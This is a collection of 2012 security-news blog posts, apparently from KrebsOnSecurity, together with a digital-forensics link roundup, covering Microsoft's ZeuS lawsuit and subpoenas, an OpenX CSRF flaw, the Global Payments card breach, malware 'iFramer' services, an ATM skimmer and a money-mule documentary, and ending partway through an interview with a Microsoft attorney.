Bits and Bytes

If the miscreants behind the ZeuS botnets that Microsoft sought to destroy with a civil lawsuit last month didn’t already know that the software giant also wished to unmask them, they almost certainly do now. Google, and perhaps other email providers, recently began notifying the alleged botmasters that Microsoft was requesting their personal details.

Microsoft’s unconventional approach to pursuing dozens of ZeuS botmasters offers a rare glimpse into how email providers treat subpoenas for account information. But the case also is once again drawing fire from a number of people within the security community who question the wisdom and long-term consequences of Microsoft’s strategy for combating cybercrime without involving law enforcement officials.

Last month, Microsoft made news when it announced a civil lawsuit that it said disrupted a major cybercrime operation that used malware to steal $100 million from consumers and businesses over the past five years. That legal maneuver may have upset some cyber criminal operations, but it also angered many in the security research community who said they felt betrayed by the action. Critics accused Microsoft of exposing sensitive information that a handful of researchers had shared in confidence, and of delaying or derailing international law enforcement investigations into ZeuS Trojan activity.

Part of the controversy stems from the bargain that Microsoft struck with a federal judge in the case. The court granted Microsoft the authority to quietly seize dozens of domain names and Internet servers that miscreants used to control the botnets. In exchange, Microsoft agreed to make every effort to identify the “John Does” that had used those resources, and to give them an opportunity to contest the seizure. The security community was initially upset by Microsoft’s first stab at that effort, in which it published the nicknames, email addresses and other identifying information on the individuals thought to be responsible for renting those servers and domains.

And then the other shoe dropped: Over the past few days, Google began alerting the registrants of more than three dozen Gmail accounts that were the subject of Microsoft’s subpoenas for email records. The email addresses were already named in Microsoft’s initial complaint posted at zeuslegalnotice.com, which listed nicknames and other information tied to 39 separate “John Does” that Microsoft is seeking to identify. But when Microsoft subpoenaed the email account information on those John Does, Google followed its privacy policy, which is to alert each of the account holders that it was prepared to turn over their personal information unless they formally objected to the action by a certain date.

According to sources who received the notices but asked not to be named, the Google alerts read:

“Hello,

Google has received a subpoena for information related to your Google
account in a case entitled Microsoft Corp., FS-ISAC, Inc. and NACHA v.
John Does 1-39 et al., US District Court, Northern District of California,
1:12-cv-01335 (SJ-RLM) (Internal Ref. No. 224623).

To comply with the law, unless you provide us with a copy of a motion
to quash the subpoena (or other formal objection filed in court) via
email at google-legal-support@google.com by 5pm Pacific Time on May
22, 2012, Google may provide responsive documents on this date.

For more information about the subpoena, you may wish to contact the
party seeking this information at:

Jacob M. Heath
Orrick, Herrington, & Sutcliffe, LLP
Jacob M. Heath, 1000 Marsh Road
Menlo Park, CA 94025

Google is not in a position to provide you with legal advice.

If you have other questions regarding the subpoena, we encourage you
to contact your attorney.

Thank you.”

Unlike most of its competitors in the Webmail industry, Google is exceptionally vocal about its policy for responding to subpoenas. This has earned it top marks from privacy groups like the Electronic Frontier Foundation (EFF), which recently ranked ISPs and social media firms on the transparency of their policies about responding to requests for information filed by the government or from law enforcement.

Google spokeswoman Christine Chen said she could not comment on specific legal cases, but said the company complies with valid legal process.

“We take user privacy very seriously, and whenever we receive a request we make sure it meets both the letter and spirit of the law before complying,” Chen said. “When possible and legal to do so, we notify affected users about requests for user data that may affect them. And if we believe a request is overly broad, we will seek to narrow it.”

At least 15 of the email accounts named in Microsoft’s lawsuit were addresses at hotmail.com or msn.com, both free Webmail services run by Microsoft. It’s not clear whether Microsoft gave those account holders a heads up about the subpoena. I asked Richard Boscovich, the former Justice Department lawyer and one of the architects of Microsoft’s legal strategy to target botnets with civil actions; he didn’t know, and referred me to Microsoft’s compliance unit. I’m still waiting for an answer. But it’s worth noting that Google was the only email provider on EFF’s list that was recognized for reliably alerting users about data demands. Microsoft was not recognized on this front.

Marcia Hofmann, a senior staff attorney with the EFF, said Microsoft’s legal effort underscores the tension between traditional law enforcement processes and companies using civil litigation to protect their own users and to vindicate their own interests.

“I suspect this is a situation where Microsoft feels law enforcement isn’t moving quickly enough,” Hofmann said. “But it also basically compromises law enforcement’s ability to do anything about the problem, and makes it possible for the suspects to evade any sort of law enforcement action.”

CUT-AND -PASTE JUSTICE?

Critics of the Microsoft effort say certain clues prove that the company borrowed and published raw intelligence without fully understanding the data’s true value and origins. Andy Fried, a former law enforcement official and owner of the Alexandria, Va. based security consultancy Deteque, was a co-founder of the little-known ZeuS Working Group, an ad hoc and extremely secretive collection of law enforcement officials and private security professionals dedicated to tracking ZeuS activity with the aim of bringing those responsible to justice.

“A basic tenet of this trust group is that everyone feels free to share data, but the rule is you never release that data outside of the trust group without express permission of whoever provided the data,” Fried said. “But there was no way that the data Microsoft published was received independently. Much of it was cut-and-pasted verbatim, and some of the data included in the search warrant was horrifically out of date.”

For instance, several of the key crime lords that Microsoft is seeking to unmask are already in prison for their crimes. John Doe #22 in Microsoft’s complaint — alleged to have used the nickname “Jonni” — is none other than Yevhen Kulibaba, a Ukrainian man arrested in London in 2010 and named as a ringleader of a money mule recruitment gang there. Kulibaba is currently serving a four-year jail sentence in connection with the ZeuS activity.

Microsoft said John Doe #23 goes by the alias “jtk,” yet this was the nickname used by Yuriy Konovalenko, the 30-year-old accomplice of Kulibaba who also was arrested as part of the U.K.-based ZeuS gang. Konovalenko likewise was sentenced to four years in jail.

Microsoft’s John Doe #24 is thought to go by the nickname “Veggi Roma,” but according to sources familiar with the case, this was an inside joke based on a lucky break that led police to the U.K. gang’s location. Investigators in London had been working with the FBI to monitor the communications of several members of the London-based ZeuS gang, but for some time they did not know whereabouts of the men, who were known at the time only as Jonni and Jtk. That is, until Jtk used his Internet connection to order a pizza to be delivered to their apartment. A “Veggi Roma” pizza, to be exact.

Astute readers may be wondering how it is that Google’s emails and Microsoft’s subpoenas to the John Does named in the complaint are now public. According to Fried, that’s because some of the email addresses listed in Microsoft’s complaint as belonging to John Doe miscreants were in fact addresses used by security researchers who had registered domains to serve as “sinkholes” for one or more ZeuS botnets. Sinkholing is a practice by which researchers redirect the identification of the botnet control servers to their own server, so that malicious traffic that comes from each bot-infected client goes straight to the research box, ready to be analyzed.

COLLATERAL DAMAGE

Microsoft maintains that it worked with several security industry partners, and that it was operating under the assumption that the information those partners provided was either their own, or was freely available amongst them for the purpose of securing the Internet.

Microsoft’s Boscovich said the company did not work with law enforcement on this operation, and so had no idea whether there were ongoing or adjudicated investigations related the John Does named in its case. He emphasized that protecting customers was the company’s number one priority.

“Our main objective was to stop the bleeding, and everything we do is specifically related to that mission,” Boscovich said. “Congress specifically envisioned that it was and is appropriate for private entities to protect themselves and their interests, and as in this case, the interests of our customers. People are continuing to be victimized, computers compromised, identities stolen, and now those systems are posing a threat to other people on internet, irrespective of what operating systems they’re using.”

For his part, Fried said he believes Microsoft will soon find it more difficult to obtain sensitive information that security researchers and law enforcement gather about key cybercrime suspects. He also fears that the ZeuS working group and other informal information-sharing groups may disband or become less effective as a result of this case.

“Microsoft discounted everyone but themselves with their initial action, and they’ve compounded things pretty quickly with these subpoenas,” Fried said. “This is also going to cause collateral damage for a lot of trust groups, while all that they’ve accomplished is little more than a very miniscule inconvenience to the bad guys, whose servers were back up within 24 hours of the takdeowns.”

Jon Praed, founding partner of the Arlington, Va. based Internet Law Group, said he’s sympathetic to Microsoft’s position, and believes Google should have taken the trouble to investigate whether the John Doe accounts named in Microsoft’s lawsuit deserved to be notified.

“Unfortunately, most email providers have a one-size-fits-all privacy policy,” Praed said. “All of these companies have tried to create the legal right to do the right thing, but they’re making almost no attempt to apply that policy in practice. At the same time, Microsoft is spending a tremendous amount of money trying to stop this activity, and I don’t know anyone else out there who is even trying to do this.”

Hackers are actively exploiting a dangerous security vulnerability in OpenX — an online ad-serving solution for Web sites — to run booby-trapped ads that serve malware and browser exploits across countless Web sites that depend on the solution.

Security experts have been warning for months about mysterious attacks on OpenX installations in which the site owners discovered new rogue administrator accounts. That access allows miscreants to load tainted ads on sites that rely on the software. The bad ads usually try to foist malware on visitors, or frighten them into paying for bogus security software.

OpenX is only now just starting to acknowledge the attacks, as more users are coming forward with unanswered questions about the mysteriously added administrator accounts.

This problem first came to my attention after I read a blog post by infosec researcher Mark Baldwin, who wrote late last month about finding an unauthorized administrative account called “openx-manager” on one of his clients’ OpenX 2.8.8 installations, the latest version. After much investigation, Baldwin found that the rogue admin account was created virtually at the same instant that he’d last logged in to the customer’s OpenX installation.

Based on these and other findings documented in his blog, Baldwin concluded that OpenX 2.8.8 contains an unpatched flaw known as a cross-site request forgery (CSRF) vulnerability. These types of flaws can be especially sneaky because they are used to trick the victim into loading a page that contains a malicious request. CSRF attacks are most often used to force an end user to execute unwanted actions on a Web application in which he/she is currently authenticated, such as purchasing an item, or adding/deleting account information.

Baldwin told me he believes the attackers were able to add the rogue admin account to his client’s OpenX installation because OpenX contains a CSRF vulnerability that allows such actions.

“When you login to the OpenX application, an ad loads via an iframe on the right side of the dashboard,” Baldwin said in an interview with KrebsOnSecurity. “OpenX uses this to promote different products of theirs (currently OpenX Market). This iframe makes calls to d1.openx.org and most importantly, loads some Javascript. This is important because the only way the CSRF attack would be able to create a new user is via javascript, since that action uses the POST method. The IP address of d1.openx.org is 173.241.250.2 and the address of adserver.openx.org is 173.241.250.3. For all I know these may be the same servers. My belief is that these systems were compromised and the Javascript was modified to inject the rogue admin account via the iframe in the dashboard. So when an administrator logs in, the account would be created without any interaction from him.”

I confronted OpenX officials about this on Monday. In a very brief phone call today, company executives declined to discuss the attacks in detail, but acknowledged the existence of a CSRF vulnerability in the software that powers both their free and enterprise advertising platforms. OpenX Chief Technology Officer Michael Todd said the company would soon be publishing instructions on its blog outlining steps that users can take to prevent attackers from taking advantage of this flaw, and that it hoped to roll out an official fix for its OpenX Source product, which is the free version of the platform offered to anyone who wishes to host their own digital advertising services.

“What we’re going to do early next week — on Monday or Tuesday — is release a new version of OpenX for people to download as soon as possible,” Todd said. “We’re taking an extra few days to make sure that this gets done correctly and that we’re doing all the testing we need to do before we push that out. But first, we’ll publish a mitigation post that will tell people how they can change their systems,” to mitigate the threat, he said.

OpenX’s head of communications, Al Duncan, inexplicably cut the interview short after I’d asked just two questions, so I was unable to gain clarity on other aspects of this attack, such as whether OpenX’s internal systems may have been abused in the compromises, and how long the company has been aware of the problem. I also wanted to know more about how this vulnerability differed from a similar CSRF flaw in OpenX v. 2.8.7 that was disclosed in June 2011 by researcher Narendra Shinde.

It’s unclear whether the CSRF flaw detailed by Shinde is effectively the same bug that exists in this latest version. But the attackers targeting these flaws appear to have used the same name for the rogue admin account that Baldwin discovered on his client’s OpenX installation: “openx-manager.”

Until OpenX publishes its blog post, users and customers of this product should consider reviewing the mitigation advice offered at Baldwin’s blog.

For more background on this subject, see OpenX forum posts from Nov. 2011, January 2012,  March 2012, and April 2012. Internet security firms Armorize and Sophos also have been sounding the alarm about these attacks.

A hacker break-in at credit and debit card processor Global Payments Inc. dates back to at least early June 2011, Visa and MasterCard warned in updated alerts sent to card-issuing banks in the past week. The disclosures offer the first additional details about the length of the breach since Global Payments acknowledged the incident on March 30, 2012.

Visa and MasterCard send periodic alerts to card-issuing banks about cards that may need to be re-issued following a security breach at a processor or merchant. Indeed, it was two such alerts — issued within a day of each other in the final week of March — which prompted my reporting that ultimately exposed the incident. Since those initial alerts, Visa and MasterCard have issued at least seven updates, warning of additional compromised cards and pushing the window of vulnerability at Global Payments back further each time.

Initially, MasterCard and Visa warned that hackers may have had access to card numbers handled by the processor between Jan. 21, 2012 and Feb. 25, 2012. Subsequent alerts sent to banks have pushed that exposure window back to January, December, and then August. In an alert sent in the last few days, the card associations warned issuers of even more compromised cards, saying the breach extended back at least eight months, to June 2011.

Security experts say it is common for the tally of compromised cards to increase as forensic investigators gain a better grasp on the extent of a security breach. But so far, Global Payments has offered few details about the incident beyond repeating that less than 1.5 million card numbers may have been stolen from its systems.

In a letter (PDF) responding to questions from  Senator Robert P. Casey (D-Pa.), Global Payments CEO Paul Garcia maintained that the company discovered the breach internally and on its own on March 8, and that it began alerting the card associations the following day. Garcia said their initial disclosure was “forced by wild speculation in the press regarding this matter and our company.”

Global Payments spokeswoman Amy Korn declined to comment for this story, but said the company would be releasing additional information about the incident in a statement on its Web site, 2012infosecurityupdate.com, later this evening.

Update, May 4, 12:37 p.m. ET: The Wall Street Journal published a story today citing unidentified sources as saying that at least 7 million card accounts are now considered potentially vulnerable because of this breach.

Hardly a week goes by without news of some widespread compromise in which thousands of Web sites that share a common vulnerability are hacked and seeded with malware. Media coverage of these mass hacks usually centers on the security flaw that allowed the intrusions, but one aspect of these crimes that’s seldom examined is the method by which attackers automate the booby-trapping and maintenance of their hijacked sites.

Regular readers of this blog may be unsurprised to learn that this is another aspect of the cybercriminal economy that can be outsourced to third-party services. Often known as “iFramers,” such services can simplify the task of managing large numbers of hacked sites that are used to drive traffic to sites that serve up malware and browser exploits.

At the very least, a decent iFramer service will allow customers to verify large lists of file transfer protocol (FTP) credentials used to administer hacked Web sites, scrubbing those lists of invalid credential pairs. The service will then upload the customer’s malware and malicious scripts to the hacked site, and check each link to ensure the trap is properly set.

A huge percentage of malware in the wild today has the built-in ability to steal FTP credentials from infected PCs. This is possible because people who administer Web sites often use FTP software to upload files and images, and allow those programs to store their FTP passwords. Thus, many modern malware variants will simply search for popular FTP programs on the victim’s system and extract any stored credentials.

Some services, like the one offered at iframeservice.net (pictured above and at left), offer a menu of extras to help customers maintain their Web-based minefields. Iframeservice.net attempts to gain a more permanent foothold on all sites for which it is given FTP credentials, testing the sites for additional security vulnerabilities (root exploits) that may grant administrative privileges on the site’s Web server.

This service also promises to help customers stay one step ahead of antivirus companies, by monitoring URL blacklists and generating customer alerts when boobytrapped pages get flagged as malicious. In addition, it offers the automated ability to obfuscate the true destination of malicious links as a way to confuse both antivirus scanners and the legitimate administrators of the hacked sites.

A recent compromise I helped a friend deal with reminds me of a stubborn fact about hacked sites that seems relevant here. Just as PC infections can result in the theft of FTP credentials, malware infestations also often lead to the compromise of any HTML pages stored locally on the victim’s computer. Huge families of malware have traditionally included the ability to inject malicious scripts into any and all Web pages stored on host machine. In this way, PC infections can spread to any Web sites that the victim manages when the victim unknowingly uploads boobytrapped pages to his Web site.

Obviously, the best way to avoid these troubles is to ensure that your system doesn’t get compromised in the first place. But if your computer does suffer a malware infection and you manage a Web site from that machine, it’s good idea to double check any HTML pages you may have stored locally and/or updated on your site since the compromise, and to change the password used to administer your Web site (using a strong password, of course).

While I cannot say the past week was light, it definitely was quieter than most I encounter.

I’m still digging out the trench but the skies are clear.

Here are a couple of items that caught my attention this week.

Utilities and Tools

• PDF Stream Dumper was recently updated to version 0.9.320. Check the second link for a summary of the new features; one is a VirusTotal plugin.
• usboblivion – Google Project Hosting. This is actually an “anti-forensics” tool of sorts to strip out evidence of USB connected drives from the registry. It would be interesting to see if the tool itself leaves a signature of its usage (besides a clean registry I suppose…) behind.
• Exploring Symbol Type Information with PdbXtract – Mandiant blog – New tool to explore programming database files. Probably most interesting to malware analysts.
• triage-ir – Triage: Incident Response – Google Project Hosting. Another script-based tool to collect key information from a suspect system. Based on the Sysinternals Suite along with a few other key utilities. Kenneth Johnson has some thoughts recently in his Tools in the Toolbox – Triage post at the Random Thoughts of Forensics blog. Triage was updated to version 0.7 back on April 16th. More on the Automated Triage Utility here.
• For those that still haven’t tried WinFE…. – Windows Forensic Environment blog. Brett Shavers shares a quick-start guide to encourage the hesitant on just how easy it is to build your own WinFE boot disk. Check it out.
• Z-VSScopy Freeware – Z-DBackup – (free for personal use/$ for commercial use) – Very interesting tool new to me that allows you to browse VSS snapshots, cerate new ones, and copy files from a snapshot back out. It is actually a module of their Z-DBackup backup software, which makes sense as being able to leverage VSS shadow copies makes running backup jobs a bit smoother. Spotted in this AddictiveTips blog post: Create, Access, Delete & Mount Shadow Copies On Any Windows Version – Z-VSSCopy .   Other well-known tools for monitoring/accessing VSS: ShadowExplorer and the VSC Toolset: A GUI Tool for Shadow Copies.

Tips and Reminders

• The Weakest Link in Data Protection [INFOGRAPHIC] – TrendLabs Malware Blog. Nice for cubicle wall hanging!
• Memory Forensics Cheat Sheet – Forensic Methods
• USB Flash drive Serial Numbers – “UNIQUE”? – digfor blog
• DFIROnline – WriteBlocked – Great collection of online video/audio/presentations on forensic topics. Next best thing to being there in person perhaps! At least you won’t feel so left out if budget/travel belt-tightening is restricting your ability to addend these meetups and sessions.
• IChallenge: What can you do with Funky Directory Names (Part 2) – ISC Diary – More fun with CLI tricks from Mark Baggett. As always, read the comments that follow to get the full experience.

More Mandiant Goodies!

Investigating Indicators of Compromise In Your Environment With Latest Version of Redline – This is an outstanding overview of the use and functionality of Mandiant’s free Redline tool. It really shows the power this tool can provide during a system assessment and incident response…if you are very familiar with it! 

If not, after you have read Doug Wilson’s guided walk-through above, dive deeper into the Redline User Guide.

Then hop over to the OpenIOC Framework page and check out the details there. Need some more Indicators of Compromise (IOC)? Drop into the IOCs on the MANDIANT Forums.

One more item: IOC Finder to collect host system data and report IOC’s.

 An Eye on the Malware Front

• Ransomcrypt Decryption Script – F-Secure Weblog : News from the Lab. The F-Secure team cracks the ransomware Trojan:W32/Ransomcrypt code to free the files. Interesting reading.
• Pwning a Spammer’s Keylogger – SpiderLabs Anterior. This is a must-read post showing just how powerful the information a trained and determined malware analyst can be. Inspirational.
• Resolving post-malware problems – TinyApps bloggist finds two great specialized tools for dealing with post-malware issues on a system.
• The System Forensics blogger goes to town analyzing a sample piece of malware in two posts.

• IETab_IE65 Malware Analysis
• IETab_IE65 Malware Memory Analysis

“Type www.” – “Ok, w-w-w-d-o-t”; antagonising call centre scammers - For lighter fare, Troy Hunt is primed and ready when cold-called by a virus call-center scammer. No foolin this dude! With a 45 min screen capture, grab the popcorn!

Windows 8 forensic previews

The forensic learning and exploring is underway for the new Windows 8 system.  Here are just a few posts I’ve found touching on the new system.

Windows 8 Forensics – Recent post by Ethan Fleisher at the Senator Patrick Leahy Center for Digital Investigation, Champlain College. Ethan goes long and in this first review covers passes at Recycle Bin properties and USB Drive activity.

Windows 8 Forensics Part 2 – Ethan pickups up at Internet History.

Future topics of coverage promised by Ethan include Win 8 “reset and reload” feature, Event logs, Prefetching, Jump Lists, and File History features.

The Computer Forensics at Champlain College Blog where these posts came from contains a great collection of fresh material and the addition of this blog to my RSS feed list seemed a no-brainer!

Windows 8 Forensic Overview – Random Thoughts of Forensics blog – An extensive post by Kenneth Johnson covering Windows Registry artifacts.  Note, Kenneth updated his original post to reflect changes in observations between the Win8 Developer version and the newer Win8 Consumer version. Kenneth’s experience does highlight the challenge examiners and students have when a new OS is released in alpha/beta versions. It’s a great start to the learning process, however the path may be fraught with dead branches and dead-ends. Nothing will be 100% certain until the final release comes out. And even then, I suspect it will take some time for the forensic knowledge-base to be fully built-up.  There is still much to learn about Windows XP systems, and the books are still being written on Windows Vista/Win7 even as Windows 8 appears on the horizon!

The “X” Factor

Beyond the bits and bytes, deeper than the registry keys and that which lurks in unallocated space at the far-end of the hard drive, there is something special that sets some incident responders and forensic investigators apart from the rest.

Whenever I get a bit discouraged of the drudgery and lack of “play-time” learning new tools and techniques and getting my boots dirty in the trenches on a good investigation, I take heart from posts like these that are reminders that it really does take something special–an “X” factor–to be a great responder.

The Core Duo – The Digital Standard blog – From cepoug’s post

So I have recently been doing a lot of speaking and teaching, and came to an interesting conclusion about what are the core (an in my opinion, critical) skills of our trade, which I have affectingly dubbed, “The Core Duo”.

When I really started to think about it, what we do (Forensics and Incident Response) really boils down to only two things. 

1. Spotting Patterns

2. Spotting Anomalies

Now, I know this sounds really simple…maybe too simple, but let me explain.  First of all, simplicity is something that I think is frequently minimized as being undesirable.  I think there are a lot of folks who think something to the effect of, “If something can be explained in simple, easy to understand terms, it must not be very complex”.  I challenge that this is not the case.  I think, that even the most complex situations (which we all know, cyber investigations are among the most technical and convoluted anywhere) is made up of components that can be broken down and simplified.  Being able to do this is a critical element in actually understanding what you are doing and why you are doing it.  That in turn leads to be successful at what you are doing.  Which finally, leads to you solving the case, and potentially, some bad guy going to jail.

What makes a good forensicator? or how to get a job in Digital Forensics… – WriteBlocked. Michael Wilkinson opens up his review of key traits this way:

If you are already working in IT, it is possible to complete either an industry certification or graduate study or even transfer directly into a forensic position, although this is becoming harder as the pool of qualified applicants continues to grow. However no matter how qualified you are this will never guarantee you a job. Certifications and qualifications are only good for getting past the HR screening process. After that the decision will be based on other factors, partially on your performance in the interview and partly on your performance in previous jobs. When I am looking for employees I am looking for two things, motivation and the ability to solve problems. I will take these attributes over certifications any day.

A Fistful of Dongles: Border Collies – A Fistful of Dongles – Eric Huber turns to the four-legged friends for a nice analogy.

You will live and die by the people you hire and the leadership that you give them. The most critical element of your security program is having the right people on your team and providing them with the leadership and resources that they need.  You absolutely need proper tools to secure your enterprise, but the tools are secondary to the people who use them. The purpose of the tools is to help your people do their jobs. Too many organizations treat their people as glorified tool drivers rather than security professionals. If you are spending more money each year on your tools than you are on your people, you’re probably in a very bad place with your security posture.

Information security is very hard. It takes tremendous time, effort, and expense to even come close to mastery of critical information security skills such as incident response, malware analysis, and digital forensics. There is no tool that can ever substitute for a highly skilled and well led information security professional.

<snip>

Meet Jet the Border Collie. You will find no creature on Earth more in the moment than a Border Collie like Jet chasing sheep. This is what they live to do. They are fantastic at it and they enjoy it immensely.  Incident response people are the modern day information security Border Collies.  We live in a time where we have an information security community made up of incident responders who absolutely live to get up in the morning and chase people out of our networks.

Eric goes on to expand his meme wonderfully.

This week I’m going to walk into the workplace with a Border Collie mentality; motivated, focused, and ready to perform.

Cheers.

–Claus V.

An earlier version of this blog post incorrectly stated that Oracle had shipped security updates for its Java software. Oracle did push out an update for Java earlier this month — Java 6 Update 32 — but the new version was a maintenance update that did not include security fixes. My apologies for any confusion this may have caused.

I spent the past week vacationing (mostly) in Southern California, traveling from Los Angeles to Santa Barbara and on to the wine country in Santa Ynez. Along the way, I received some information from a law enforcement source in the area about a recent ATM skimmer attack that showcased a well-designed and stealthy all-in-one skimmer.

The skimmer pictured below is the backside of a card acceptance slot overlay. It was recovered by a customer at a bank in the San Fernando Valley who called the cops upon her discovery. Police in the region still have no leads on who might have placed the device. The numeral “5″ engraved in the upper right portion of this skimmer suggests that it was one in a series of fraud devices produced by this skimmer maker.

The skimmer appears to be powered by a phone battery, which connects to the card reader device and to the circuit board for a video camera. Here’s a close-up of the video card+skimmer connection.

Flip the device around, and you can see the tiny pinhole where the attached camera peers through the skimmer front to capture timestamped footage of victims entering their PINs.

Of course, looking straight on at the skimmer as it would appear attached to a compromised ATM, it might be difficult to spot the pinhole, as shown in the following picture.

A few tips about ATM skimmers and skimming scams. It’s difficult — once you’re aware of how sophisticated some of these skimmers can be — to avoid being paranoid around ATMs; friends and family often tease me for stopping to tug at ATMs that I pass on the street, even when I have no intention of withdrawing money from the machines.

Still, it’s good and healthy to be somewhat paranoid while at an ATM. Make sure nobody is “shoulder surfing” you to watch you enter your PIN. A simple precaution defeats shoulder surfing and many other types of video-based PIN stealing mechanisms: Cover the PIN pad with your hand or another object when you enter your PIN.

If you are withdrawing cash after hours, visit only well-lit ATMs and those that are in plain view of other public spaces. In the unlikely event that you discover a skimming device attached to the ATM, alert the bank or proprietor immediately. Do not attempt to walk away from a compromised ATM with a skimmer in hand. For one thing, thieves who place skimmers often lurk nearby to prevent such occurrences. Also, consider how you might explain to a police officer that the device you just removed from the ATM is not yours. If you must leave with evidence, take a picture of the compromised ATM using your mobile phone (and if you get a nice picture, please consider sending it to me!).

A deep sense of doubt and dread began to sink in halfway through our journey down a long, lonely desert highway from just outside Austin to coastal Texas. We were racing against the clock (we’d just scarfed down our third meal in a row at a roadside Subway shop), yet my minivan companions — a filmmaker from California and a husband-and-wife camera crew — seemed pleased with the footage we’d collected so far. I was far less sanguine about our prospects, and was almost certain that our carefully-laid plans to ambush a money mule on camera were about to unravel.

The scheme was hatched by Berkeley writer/director Charles Koppelman, who’d emailed me in mid-2011 about the possibility of catching some money mules on camera for a documentary he’s working on called Zero Day. Koppelman said the money shot would be a mule coming out of a bank with a wad of cash in hand, but that he’d settle for an old-fashioned sit-down interview.

At the time, I was working with a source who was injected into the communications networks of several money mule recruitment gangs. These miscreants specialize in hiring willing and unwitting “mules” through work-at-home job scams. The mules then are asked to process bank transfers that help organized cyber thieves launder money stolen from small businesses victimized by cybercrime. The networks my source was monitoring indicated the gang was grooming between 75 and 100 mules across the country on any given day, and that they were sending fraudulent transfers to mules almost daily.

I told Charles that for such a plan to work, we’d need to focus on areas that typically held the most number of mules per capita, and that meant somewhere in Florida or Texas. When my source indexed the mules and sorted them by hometown, we discovered that there were five mules being groomed for payments within about 200 miles of Austin, Texas. If we rented a car and checked in with my source on a regular basis, we might be able to secure the footage he was after, I suggested.

But I cautioned Koppelman that I gave our plan about a 20 percent chance of working. I predicted that most of the mules would quit, screw up the transfer task, or be used and discarded by the time we flew down there and actually hit the road. Indeed, when we reached our fleabag motel just south of Austin on Aug. 3, 2011, my prognostication had almost come true entirely: We were down to one last money mule: Geridana, a young, unemployed single mother of two from Webster, a small town of about 9,000 residents in southeastern Texas.

On the morning of Aug. 4, we piled into the minivan again and raced down to Webster. We didn’t attempt to make contact with her until we were parked outside of her apartment complex, which was next door to a bail bonds shop. Turns out that Geridana was a bit of an oddity: The $9,000+ the thieves had just sent her was actually the fourth such transfer that Geridana had processed in as many weeks. The most pathetic aspect of the whole scheme? She never got paid her promised monthly salary or per-task commissions.

I’ll stop the story here, because I don’t want to spoil the movie. That is, if it ever attracts enough funding to be finished. The film is co-financed by BBC Storyville, but Koppelman and his son Walker just launched a Kickstarter campaign to raise $20,000 to ensure  continued filming of the project. A short introduction to their effort (including a scene starring Yours Truly) is available in the teaser video clip below. The filmmakers are also working with New York Times reporter John Markoff, Reuters reporter Joe Menn, and author Misha Glenny.

Microsoft’s most recent anti-botnet campaign — a legal sneak attack against dozens of ZeuS botnets — seems to have ruffled the feathers of many in security community. The chief criticism is that the Microsoft operation exposed sensitive information that a handful of researchers had shared in confidence, and that countless law enforcement investigations may have been delayed or derailed as a result. In this post, I interview a key Microsoft attorney about these allegations.

Since Microsoft announced Operation B71, I’ve heard from several researchers who said they were furious at the company for publishing data on a group of hackers thought to be behind a majority of the ZeuS botnet activity — specifically those targeting small to mid-sized organizations that are getting robbed via cyber heists. The researchers told me privately that they believed Microsoft had overstepped its bounds with this action, using privileged information without permission from the source(s) of that data (many exclusive industry discussion lists dedicated to tracking cybercriminal activity have strict rules about sourcing and using information shared by other members).

At the time, nobody I’d heard from with complaints about the action wanted to speak on the record. Then, late last week, Fox IT, a Dutch security firm, published a lengthy blog post blasting Microsoft’s actions as “irresponsible,” and accusing the company of putting its desire for a public relations campaign ahead of its relationship with the security industry.

“This irresponsible action by Microsoft has led to hampering and even compromising a number of large international investigations in the US, Europe and Asia that we knew of and also helped with,” wrote Michael Sandee, Principal Security Expert at Fox IT. “It has also damaged and will continue to damage international relationships between public parties and also private parties. It also sets back cooperation between public and private parties, so called public private partnerships, as sharing will stop or will be definitely less valuable than it used to be for all parties involved.”

Sandee said that a large part of the information that Microsoft published about the miscreants involved was sourced from individuals and organizations without their consent, breaking various non-disclosure agreements (NDAs) and unspoken rules.

“In light of the whole Responsible Disclosure debate  [link added] from the end of Microsoft this unauthorized and uncoordinated use and publication of information protected under an NDA is obviously troublesome and shows how Microsoft only cares about protecting their own interests,” Sandee wrote.

Given the strong feelings that Microsoft’s actions have engendered in the Fox IT folks and among the larger security community, I reached out to Richard Boscovich, a former U.S. Justice Department lawyer who was one of the key architects of Microsoft’s legal initiative against ZeuS. One complaint I heard from several researchers who believed that Microsoft used and published data they uncovered was that the company kept the operation from nearly everyone. I asked Boscovich how this operation was different from previous actions against botnets such as Rustock and Waledac.

Boscovich: It’s essentially the same approach we’ve done in all the other operations. The problem that I think some people have is that due to the type of operation, we can’t have the entire community involved. That’s for several reasons. One is operational security. The bigger the number of people involved, the more likely is that is someone will make a mistake and say something that could jeopardize all of the work that everyone has done. Also, we’re making representations to a federal court that this is an ex-parte motion and very limited people know about it. If you have multiple people knowing, and the entire security community knows, let’s say we submit declarations from 30-40 people. A court may say, ‘Well there’s a lot of people here who know about this, so isn’t this information that’s already publicly available? Don’t these people know you’re looking at them already?’ We’re really asking for an extraordinary remedy: an ex-parte TRO [temporary restraining order] is a very high standard. We have to show an immediate threat and harm, ongoing, so much so that we can’t even give the other side notice that we’re going to sue them and take away their property.

The other concern is more operational. When I was in the Justice Department — I was there for just shy of 18 years — we even compartmentalized operations there. Information was shared on a need-to-know basis, to make sure the operation would be a success and that there wouldn’t be any inadvertent leaks. It wasn’t because we didn’t trust people, but because people sometimes make mistakes. So in this operation, just like the others, we engaged with industry partners, academic partners, and some of those who wished to be open, and others who preferred to do things behind the scenes.

Krebs: How do you respond to the criticism that Microsoft used and published data that came from core members of the security community who had placed certain restrictions on the use of that data — specifically that permission be obtained before it is shared or published?

Boscovich: Whenever we cooperate with the research community and industry partners, the assumption is that the information they provided is either their own, or is freely available amongst them for the purpose of securing the internet. They felt, we believe that all of this information should be used for the purpose for which it was intended: And that is to try to solve the problem and protect people who are being victimized by crime.

Now, there seems to be some allegations that there was information that one or two people provided to the research community –which is very large by the way — which for some reason they didn’t want to be acted upon. I don’t know what that means, but we only ask for information from our industry or academic partners that they believe is their own or is being freely shared in the community. The purpose for which we ask for this information is to reduce threat to consumers and people being victimized by crime. If there are any allegations that somehow Microsoft knew this was privileged information, the answer is absolutely not. We respect the rights of others and the information we received  from academic or industry partners…the representation was made to us that it was either their own work product, or it was made available by other researchers and that was freely shared amongst them to be used for this type of purpose.

Krebs: The Fox IT researcher accused Microsoft of disrupting law enforcement investigations into miscreants using ZeuS. Is that true?

Boscovich: Looking at the Fox-IT blog, I’m disappointed by the fact that they talk about ongoing investigations. There’s no way for us to know whether there’s an ongoing criminal investigations from law enforcement. There’s a litany of legal proscriptions and prohibitions in having that kind of information, so I’m not sure how they would know. But obviously we don’t. They omit the fact that in all of these operations, the objective is to notify and clean the victim’s computers. In addition to disrupting, we want to help clean these computers.

Krebs: And what about the criticism that Microsoft’s actions actually took down legitimate sites?

